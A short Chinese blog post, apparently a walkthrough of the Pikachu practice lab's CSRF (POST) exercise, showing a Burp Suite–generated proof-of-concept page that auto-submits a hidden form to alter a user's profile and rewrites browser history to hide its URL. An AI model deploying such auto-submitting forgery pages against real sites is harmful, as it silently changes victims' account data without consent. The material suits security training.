当前位置: 首页 > news >正文

Pikachu-csrf-CSRF(POST)

news 2025/6/28 12:18:30

发起请求

拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC 

得到以下 html 代码 ,生成poc.html 文件,当用户点击

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><form action="http://192.168.3.224:8082/vul/csrf/csrfpost/csrf_post_edit.php" method="POST"><input type="hidden" name="sex" value="11" /><input type="hidden" name="phonenum" value="11" /><input type="hidden" name="add" value="11" /><input type="hidden" name="email" value="1234" /><input type="hidden" name="submit" value="submit" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body>
</html>

打开 poc.html 页面,点击submit request ,即可达成攻击;


http://www.mrgr.cn/news/41599.html

相关文章:

  • Pikachu-xss防范措施 - href输出 js输出
  • C++ 矩阵拼接相关问题记录
  • 酒店构建数字化业产业—未来之窗行业应用跨平台架构
  • 草莓及叶片病害检测数据集 4300张 草莓病害 voc yol 7类。
  • 每日一题:二分查找
  • python引用计数
  • Windows+VSCode运行C/C++时生成的*.exe问题
  • 46. 全排列
  • 边缘自适应粒子滤波(Edge-Adaptive Particle Filter)的MATLAB函数示例,以及相应的讲解
  • C语言 | Leetcode C语言题解之第453题最小操作次数使数组元素相等
  • BBED标记坏块以及修复坏块
  • RabbitMQ 优点和缺点
  • netty之Netty与SpringBoot整合
  • PCL 点云直通滤波
  • Python | Leetcode Python题解之第452题用最少数量的箭引爆气球
  • 【理论科学与实践技术】数学与经济管理中的学科与实用算法
  • 谷歌最新发布:185个AI应用案例深度解析
  • Qt 概述
  • Spring Boot+VUE《班级综合测评管理系统》
  • 【漏洞复现】大华智慧园区综合管理平台 video 任意文件上传漏洞